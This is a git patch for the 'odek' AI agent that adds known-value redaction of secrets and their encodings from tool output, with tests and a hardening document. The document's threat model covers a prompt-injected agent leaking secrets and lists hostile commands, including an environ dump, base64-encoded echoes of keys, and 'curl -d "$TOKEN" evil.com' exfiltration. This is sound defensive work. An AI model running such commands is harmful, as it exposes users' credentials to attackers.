From 4a57372ec861afe306be44124313198d9c01ea6c Mon Sep 17 00:00:00 2001 From: Rolando Santamaria Maso Date: Wed, 3 Jun 2026 09:15:47 +0200 Subject: [PATCH] fix(redact): close secret-leak gaps on the tool output surface MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Tool output is redacted before it enters the transcript, but the format-pattern matcher only catches secrets whose shape it recognises. Three gaps let secrets through: - a bare echo of a non-standard-format secret (e.g. a Telegram bot token, which has no name= context for the generic rule) - a trivially encoded secret (echo $KEY | base64 / xxd / rev) - a /proc/self/environ dump (NUL-delimited, no NAME= for the rule) Add a known-value redaction layer: odek registers its own secrets (the LLM API key, the Telegram bot token, sensitively-named env vars) at startup and redacts those exact values plus their common encodings (base64, hex, percent, reversed), regardless of format. This is the reliable layer for odek's own secrets; the format patterns stay for secrets we don't hold but recognise by shape. Also add a Telegram bot-token pattern. Env scanning matches whole _/- segments so GIT_AUTHOR_NAME and the like are not mistaken for secrets; values under 8 chars are ignored to avoid over-redaction. Matching is literal (strings.Replacer) — no ReDoS risk from arbitrary secret contents. The agent process keeps its keys (it needs them to talk to the model); this only stops them leaking back out through tool output. Side-channel exfiltration and arbitrary transformations remain the job of the network-egress controls — documented in docs/REDACTION_HARDENING.md. Co-Authored-By: Claude Opus 4.8 (1M context) --- cmd/odek/subagent.go | 4 + docs/REDACTION_HARDENING.md | 127 +++++++++++++++++++ internal/config/loader.go | 11 ++ internal/redact/known_value_test.go | 126 +++++++++++++++++++ internal/redact/redact.go | 184 +++++++++++++++++++++++++++- 5 files changed, 451 insertions(+), 1 deletion(-) create mode 100644 docs/REDACTION_HARDENING.md create mode 100644 internal/redact/known_value_test.go diff --git a/cmd/odek/subagent.go b/cmd/odek/subagent.go index 9cc28fe..ab69ee3 100644 --- a/cmd/odek/subagent.go +++ b/cmd/odek/subagent.go @@ -13,6 +13,7 @@ import ( "github.com/BackendStack21/odek/internal/config" "github.com/BackendStack21/odek/internal/danger" "github.com/BackendStack21/odek/internal/llm" + "github.com/BackendStack21/odek/internal/redact" "github.com/BackendStack21/odek/internal/render" "github.com/BackendStack21/odek/internal/skills" ) @@ -263,6 +264,9 @@ func subagentCmd(args []string) error { // tool the agent runs that prints its own env. if fdKey := readKeyFromInheritedFD(); fdKey != "" { resolved.APIKey = fdKey + // Register the FD-supplied key so it is redacted from tool output + // (LoadConfig only saw the env-resolved value, which may be empty here). + redact.RegisterSecret(fdKey) } // Apply parent-supplied trust constraints. When the parent marked the diff --git a/docs/REDACTION_HARDENING.md b/docs/REDACTION_HARDENING.md new file mode 100644 index 0000000..e8c55f8 --- /dev/null +++ b/docs/REDACTION_HARDENING.md @@ -0,0 +1,127 @@ +# Redaction Hardening Plan + +Status: in progress. The first increment (known-value redaction + Telegram +token pattern) ships in `internal/redact`. This document is the roadmap for +making the redaction layer robust against the full set of known attacks on +**the tools surface**, and an honest statement of what redaction can and +cannot defend. + +--- + +## Scope and why + +odek's redaction layer (`internal/redact`) sanitises **tool output** before it +is appended to the conversation and persisted to the session +(`internal/loop/loop.go`, `internal/session/session.go`). It exists so that a +secret which surfaces in a command's output — accidentally or because a +prompt-injected agent went looking for it — does not end up in the transcript, +the session file, the model provider's logs, or a Telegram chat. + +The surface we harden is deliberately narrow: **what tools return to the +agent.** We do *not* try to scrub odek's own process environment, because the +agent process legitimately needs its secrets — above all the LLM API key it +uses to talk to the model. Removing the key from the process is not an option; +keeping it from *leaking back out through tool output* is. That makes the +redaction layer the right control, and it must be as close to airtight as a +lexical filter can be. + +## Threat model (tools surface) + +An attacker who has achieved prompt injection drives the agent to disclose a +secret it can read, by routing it through tool output that returns to the +transcript. Concretely: + +| # | Vector | Example | Pre-fix status | +|---|--------|---------|----------------| +| 1 | Env dump of well-named, standard-format key | `env`, `printenv` | Caught (format + name patterns) | +| 2 | Bare echo of a non-standard-format secret | `echo $TELEGRAM_BOT_TOKEN` | **Leaked** | +| 3 | Encoded secret | `echo $API_KEY \| base64`, `\| xxd`, `\| rev` | **Leaked** | +| 4 | `/proc` environ dump | `cat /proc/self/environ` | Partially (NUL-delimited, name pattern needs `NAME=`) | +| 5 | Secret read from a file | `cat ~/.config/odek/secrets.env` | Depends on format | +| 6 | Secret embedded in a longer string | `curl -H "x: $TOKEN" ...` echoed back in verbose output | Depends on format | + +Vectors 2–4 are the gaps this work closes. + +## Out of scope for redaction (documented limits) + +These are **not** solvable by a lexical filter and must be defended elsewhere +(network-egress controls, approval gating, `non_interactive: deny`): + +- **Arbitrary transformation** — `gzip`, `openssl enc`, gpg, custom character + substitution, chunking a secret across multiple commands. We precompute the + *common* encodings (base64, hex, url, reversed); we cannot enumerate all of + them. +- **Side-channel exfiltration** — `curl -d "$TOKEN" evil.com`, a reverse + shell, DNS tunnelling. The secret never returns to the tool surface, so + redaction never sees it. This is the job of the egress denylist and + `network_egress: prompt` + `non_interactive: deny` in the danger config. + +Redaction is a **safety net against disclosure into the transcript**, not a +guarantee against a determined exfiltration attempt. Defense in depth: pair it +with the egress controls. + +--- + +## Design + +Two cooperating layers run inside `RedactSecrets`: + +### Layer 1 — Known-value redaction (new) + +odek knows its own secrets. We register them at startup and redact the exact +values — plus their common encodings — wherever they appear, regardless of +format. This closes vectors 2, 3, and 4 for odek's own secrets. + +- `RegisterSecret(value)` — records a value and its encodings: base64 + (std/raw/url), hex (upper/lower), percent-encoding, reversed. +- `RegisterSecretsFromEnv()` — registers values of env vars whose name has a + secret-bearing segment (`KEY`, `TOKEN`, `SECRET`, `PASSWORD`, `PASS`, + `CREDENTIAL`, …), matched on whole `_`/`-` segments so `GIT_AUTHOR_NAME` + (AUTHOR) and `compass` (PASS) are *not* treated as secrets. +- Seeded once in `config.LoadConfig` from the resolved API key, the Telegram + bot token, and the environment; and in the subagent path for the + FD-supplied key. +- Values shorter than `minSecretLen` (8) are ignored to avoid over-redacting + ordinary text. Matching is literal (a `strings.Replacer`), so no regex + metacharacter or ReDoS risk from arbitrary secret contents. + +### Layer 2 — Format patterns (existing, extended) + +Regex patterns for secrets we *don't* hold but recognise by shape (a +customer's AWS key in a file, a GitHub PAT, a private key). Extended here with +a **Telegram bot token** pattern (`:<35-char>`), which has no `name=` +context for the generic rule to catch. + +## Implemented in this PR + +- `internal/redact/redact.go`: known-value registry (`RegisterSecret`, + `RegisterSecretsFromEnv`, `ResetSecrets`), encoding-aware literal matching, + wired into `RedactSecrets` / `HasSecrets` / `CountSecrets`; Telegram + bot-token pattern. +- `internal/config/loader.go`: seed the registry at startup. +- `cmd/odek/subagent.go`: register the FD-supplied API key. +- `internal/redact/known_value_test.go`: coverage for vectors 2–4, env-scan + selectivity, and the short-value guard. + +## Follow-ups (not in this PR) + +1. **Streaming redaction across chunk boundaries.** A secret split across two + streamed tool-output chunks evades per-chunk redaction. Buffer a sliding + window equal to the longest registered form. +2. **Entropy heuristic for unknown secrets.** Flag high-entropy tokens of + secret-like length that match no pattern and no known value, to catch + third-party secrets read from files (vector 5) — tuned to avoid hashes/UUIDs. +3. **Redaction telemetry.** Count redaction hits per session and surface a + warning when tool output contained secrets, so operators notice exfil + attempts rather than silently dropping them. +4. **Argument/echo-back coverage (vector 6).** Consider redacting tool *inputs* + (command strings) that embed a known value, not just outputs. +5. **Periodic re-seed.** If secrets can rotate at runtime, re-run + `RegisterSecretsFromEnv` on reload. + +## Testing + +`go test ./internal/redact/` covers each closed vector. New tests: +`TestTelegramBotTokenPattern`, `TestKnownValue_BareEcho`, +`TestKnownValue_Encodings`, `TestKnownValue_ProcEnvironDump`, +`TestRegisterSecretsFromEnv`, `TestRegisterSecret_TooShortIgnored`. diff --git a/internal/config/loader.go b/internal/config/loader.go index 66d4200..ce755af 100644 --- a/internal/config/loader.go +++ b/internal/config/loader.go @@ -24,6 +24,7 @@ import ( "github.com/BackendStack21/odek/internal/danger" "github.com/BackendStack21/odek/internal/mcpclient" "github.com/BackendStack21/odek/internal/memory" + "github.com/BackendStack21/odek/internal/redact" "github.com/BackendStack21/odek/internal/skills" "github.com/BackendStack21/odek/internal/telegram" ) @@ -727,6 +728,16 @@ func LoadConfig(cli CLIFlags) ResolvedConfig { os.Unsetenv("DEEPSEEK_API_KEY") os.Unsetenv("OPENAI_API_KEY") + // Seed the redaction layer with odek's own secrets so they (and their + // common encodings) are stripped from any tool output, even when the + // agent prints them in a format the pattern matchers don't recognise. + // The API key is registered from its resolved value (the unsets above + // only remove it from the environment, not from resolved.APIKey); + // RegisterSecretsFromEnv covers .env / secrets.env injected values. + redact.RegisterSecret(resolved.APIKey) + redact.RegisterSecret(resolved.Telegram.Token) + redact.RegisterSecretsFromEnv() + return resolved } diff --git a/internal/redact/known_value_test.go b/internal/redact/known_value_test.go new file mode 100644 index 0000000..ad3ea03 --- /dev/null +++ b/internal/redact/known_value_test.go @@ -0,0 +1,126 @@ +package redact + +import ( + "encoding/base64" + "encoding/hex" + "strings" + "testing" +) + +// TestTelegramBotTokenPattern covers the format-pattern gap: a bare Telegram +// bot token has no name= context and no recognised key prefix, so before the +// dedicated pattern it slipped through unredacted. +func TestTelegramBotTokenPattern(t *testing.T) { + ResetSecrets() + token := "123456789:AAHfakeTokenValueExample0123456789abcdef" + out := RedactSecrets("bot token is " + token) + if strings.Contains(out, token) { + t.Fatalf("telegram token not redacted by pattern: %q", out) + } + if !strings.Contains(out, "[REDACTED]") { + t.Fatalf("expected [REDACTED] marker, got %q", out) + } +} + +// TestKnownValue_BareEcho covers the core gap: a registered secret whose +// format no pattern recognises must still be redacted when printed verbatim. +func TestKnownValue_BareEcho(t *testing.T) { + ResetSecrets() + defer ResetSecrets() + + // A token shape no built-in pattern matches. + secret := "xz9-CUSTOM-internal-credential-2f7b1c4e8d" + RegisterSecret(secret) + + if got := RedactSecrets("value: " + secret); strings.Contains(got, secret) { + t.Fatalf("registered secret leaked in bare echo: %q", got) + } + if !HasSecrets(secret) { + t.Fatalf("HasSecrets should detect a registered value") + } +} + +// TestKnownValue_Encodings covers the "echo $KEY | base64 / xxd" gap: common +// encodings of a registered secret must also be redacted. +func TestKnownValue_Encodings(t *testing.T) { + ResetSecrets() + defer ResetSecrets() + + secret := "sk-ant-internal-do-not-leak-abcdef0123456789" + RegisterSecret(secret) + b := []byte(secret) + + cases := map[string]string{ + "raw": secret, + "base64-std": base64.StdEncoding.EncodeToString(b), + "base64-raw": base64.RawStdEncoding.EncodeToString(b), + "base64-url": base64.URLEncoding.EncodeToString(b), + "hex-lower": hex.EncodeToString(b), + "hex-upper": strings.ToUpper(hex.EncodeToString(b)), + "reversed": reverseString(secret), + } + for name, enc := range cases { + out := RedactSecrets("leaked=" + enc) + if strings.Contains(out, enc) { + t.Errorf("%s encoding leaked: %q", name, out) + } + } +} + +// TestKnownValue_ProcEnvironDump simulates `cat /proc/self/environ`, whose +// NUL-delimited output the literal matcher handles regardless of delimiters. +func TestKnownValue_ProcEnvironDump(t *testing.T) { + ResetSecrets() + defer ResetSecrets() + + secret := "telegram-bot-secret-value-9988776655" + RegisterSecret(secret) + + dump := "PATH=/usr/bin\x00HOME=/root\x00TELEGRAM_BOT_TOKEN=" + secret + "\x00TERM=xterm" + out := RedactSecrets(dump) + if strings.Contains(out, secret) { + t.Fatalf("secret leaked in /proc environ dump: %q", out) + } +} + +// TestRegisterSecretsFromEnv only registers values of sensitively-named vars. +func TestRegisterSecretsFromEnv(t *testing.T) { + ResetSecrets() + defer func() { + osEnviron = defaultOsEnviron + ResetSecrets() + }() + + secret := "anthropic-key-value-abcdefghij1234567890" + authorName := "Jane Developer" + osEnviron = func() []string { + return []string{ + "ANTHROPIC_API_KEY=" + secret, + "GIT_AUTHOR_NAME=" + authorName, // AUTHOR must NOT be treated as secret + "PATH=/usr/bin", + } + } + RegisterSecretsFromEnv() + + if got := RedactSecrets("k=" + secret); strings.Contains(got, secret) { + t.Errorf("env secret not redacted: %q", got) + } + if got := RedactSecrets("author is " + authorName); !strings.Contains(got, authorName) { + t.Errorf("non-secret env var over-redacted: %q", got) + } +} + +// TestRegisterSecret_TooShortIgnored guards against over-redacting short +// values that would collide with ordinary text. +func TestRegisterSecret_TooShortIgnored(t *testing.T) { + ResetSecrets() + defer ResetSecrets() + + RegisterSecret("abc") // below minSecretLen + if HasSecrets("abc appears in normal prose") { + t.Fatalf("short value should not have been registered") + } +} + +// defaultOsEnviron preserves the production osEnviron for restore in tests. +var defaultOsEnviron = osEnviron diff --git a/internal/redact/redact.go b/internal/redact/redact.go index b198ce3..00ba236 100644 --- a/internal/redact/redact.go +++ b/internal/redact/redact.go @@ -18,8 +18,13 @@ package redact import ( + "encoding/base64" + "encoding/hex" + "net/url" + "os" "regexp" "strings" + "sync" ) // ── Patterns ─────────────────────────────────────────────────────────── @@ -61,6 +66,10 @@ var patterns = []*regexp.Regexp{ // Slack bot tokens: xoxb-, xoxp- regexp.MustCompile(`xox[abpos]-[0-9]{10,}-[0-9]{10,}-[a-zA-Z0-9]{24,}`), + // Telegram bot tokens: :<35-char base64url secret>. + // e.g. 123456789:AAHfakeTokenValueExample0123456789abcdef + regexp.MustCompile(`\b[0-9]{5,}:[A-Za-z0-9_-]{30,}\b`), + // Stripe keys: sk_live_, sk_test_, pk_live_, pk_test_ regexp.MustCompile(`[rs]k_(live|test)_[a-zA-Z0-9]{24,}`), @@ -106,6 +115,12 @@ var patterns = []*regexp.Regexp{ // RedactSecrets scans text for known secret patterns and replaces matched // content with "[REDACTED]". Returns the sanitized text. // +// Two layers run: first the known-value layer (exact secret values registered +// via RegisterSecret, plus their common encodings), then the format-pattern +// layer below. The known-value layer is the reliable one for odek's own +// secrets — it catches them even when printed in a format the patterns miss +// (a bare echo of a non-standard token, base64/hex encodings, etc.). +// // The function is safe to call on empty strings and strings without secrets // (returns the original string unchanged in the common case). func RedactSecrets(text string) string { @@ -114,18 +129,27 @@ func RedactSecrets(text string) string { } result := text + if r := currentReplacer(); r != nil { + result = r.Replace(result) + } for _, p := range patterns { result = p.ReplaceAllString(result, "[REDACTED]") } return result } -// HasSecrets returns true if the text contains any recognized secret pattern. +// HasSecrets returns true if the text contains any recognized secret pattern +// or any registered known secret value. // Useful for quick pre-checks without allocating the full redacted string. func HasSecrets(text string) bool { if text == "" { return false } + for _, f := range currentForms() { + if strings.Contains(text, f) { + return true + } + } for _, p := range patterns { if p.MatchString(text) { return true @@ -149,6 +173,9 @@ func CountSecrets(text string) int { return 0 } count := 0 + for _, f := range currentForms() { + count += strings.Count(text, f) + } for _, p := range patterns { matches := p.FindAllString(text, -1) count += len(matches) @@ -156,6 +183,161 @@ func CountSecrets(text string) int { return count } +// ── Known-value redaction ────────────────────────────────────────────── +// +// Pattern matching only catches secrets whose *format* we recognise. odek +// also holds its own secrets: the LLM API key (needed to talk to the model), +// the Telegram bot token, and anything injected via .env / secrets.env. +// Because we know those exact values, we can redact them — and their common +// encodings — from tool output regardless of how the agent prints them. +// +// This closes two gaps that pure pattern matching cannot: +// - a bare echo of a secret whose format we don't recognise +// (e.g. `echo $TELEGRAM_BOT_TOKEN`) +// - a trivially transformed secret (`echo $API_KEY | base64`, `| xxd`) +// +// It does NOT defend against arbitrary transformations the agent could apply +// (gzip, openssl enc, char substitution) or against side-channel exfiltration +// that never returns text to the tool surface — those are the job of the +// network-egress controls, not redaction. See docs/REDACTION_HARDENING.md. + +// minSecretLen is the shortest raw value we will register. Short values risk +// over-redacting ordinary text, and real keys/tokens are far longer. +const minSecretLen = 8 + +var ( + secretsMu sync.RWMutex + secretSet = map[string]struct{}{} // every literal form to redact + secretReplacer *strings.Replacer + secretFormsList []string +) + +// osEnviron is os.Environ, swapped in tests. +var osEnviron = os.Environ + +// RegisterSecret records a known secret value so that it — and its common +// encodings (base64 std/url, hex, percent-encoding, reversed) — are redacted +// from all tool output. Values shorter than minSecretLen are ignored to +// avoid over-redaction. Safe to call repeatedly and concurrently; callers +// should register before any tool output is produced (i.e. at startup). +func RegisterSecret(value string) { + value = strings.TrimSpace(value) + if len(value) < minSecretLen { + return + } + forms := encodeForms(value) + secretsMu.Lock() + defer secretsMu.Unlock() + changed := false + for _, f := range forms { + if len(f) < minSecretLen { + continue + } + if _, ok := secretSet[f]; !ok { + secretSet[f] = struct{}{} + changed = true + } + } + if changed { + rebuildReplacerLocked() + } +} + +// RegisterSecretsFromEnv scans the process environment for variables whose +// names look sensitive and registers their values. This automatically covers +// secrets injected via .env (docker env_file) or ~/.odek/secrets.env without +// the caller having to enumerate them. +func RegisterSecretsFromEnv() { + for _, kv := range osEnviron() { + name, val, ok := strings.Cut(kv, "=") + if !ok { + continue + } + if sensitiveName(name) { + RegisterSecret(val) + } + } +} + +// ResetSecrets clears the known-value registry. Intended for tests. +func ResetSecrets() { + secretsMu.Lock() + defer secretsMu.Unlock() + secretSet = map[string]struct{}{} + secretReplacer = nil + secretFormsList = nil +} + +// sensitiveName reports whether an env var name has a segment that marks it +// as secret-bearing. Matching whole `_`/`-` separated segments avoids +// substring false positives like GIT_AUTHOR (AUTH) or compass (PASS). +func sensitiveName(name string) bool { + for _, seg := range strings.FieldsFunc(name, func(r rune) bool { return r == '_' || r == '-' }) { + switch strings.ToUpper(seg) { + case "KEY", "APIKEY", "TOKEN", "SECRET", "PASSWORD", "PASSWD", "PASS", + "CREDENTIAL", "CREDENTIALS", "PRIVATEKEY", "ACCESSKEY", "SECRETKEY": + return true + } + } + return false +} + +// encodeForms returns the raw value plus the encodings an agent is most +// likely to pipe a secret through. url.QueryEscape and the base64 variants +// frequently coincide for alphanumeric keys; duplicates are collapsed by the +// registry's set. +func encodeForms(v string) []string { + b := []byte(v) + return []string{ + v, + base64.StdEncoding.EncodeToString(b), + base64.RawStdEncoding.EncodeToString(b), + base64.URLEncoding.EncodeToString(b), + base64.RawURLEncoding.EncodeToString(b), + hex.EncodeToString(b), + strings.ToUpper(hex.EncodeToString(b)), + url.QueryEscape(v), + reverseString(v), + } +} + +func reverseString(s string) string { + r := []rune(s) + for i, j := 0, len(r)-1; i < j; i, j = i+1, j-1 { + r[i], r[j] = r[j], r[i] + } + return string(r) +} + +// rebuildReplacerLocked recomputes the replacer and form list from secretSet. +// Caller must hold secretsMu for writing. +func rebuildReplacerLocked() { + forms := make([]string, 0, len(secretSet)) + pairs := make([]string, 0, len(secretSet)*2) + for f := range secretSet { + forms = append(forms, f) + pairs = append(pairs, f, "[REDACTED]") + } + secretFormsList = forms + if len(pairs) == 0 { + secretReplacer = nil + return + } + secretReplacer = strings.NewReplacer(pairs...) +} + +func currentReplacer() *strings.Replacer { + secretsMu.RLock() + defer secretsMu.RUnlock() + return secretReplacer +} + +func currentForms() []string { + secretsMu.RLock() + defer secretsMu.RUnlock() + return secretFormsList +} + // RedactWithCount returns both the redacted text and a count of redacted // secrets, so callers can log how many were caught without a second pass. func RedactWithCount(text string) (string, int) {